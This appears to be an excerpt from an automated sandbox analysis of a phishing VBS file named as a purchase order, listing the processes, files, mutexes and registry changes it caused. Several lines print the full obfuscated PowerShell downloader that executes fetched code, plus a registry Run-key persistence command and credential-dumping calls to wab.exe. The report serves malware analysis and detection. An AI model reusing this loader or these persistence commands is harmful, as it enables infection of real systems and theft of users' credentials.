                Source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@25/11@3/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,16_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,18_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,16_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,16_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,16_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kasinoerne.PriJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jmoughoe-LDOW5Q
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvpnexgb.hba.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1908
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3892
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 0000000B.00000002.3444830875.00000000216F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe, 00000010.00000002.2603925178.0000000005343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_17-33261
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
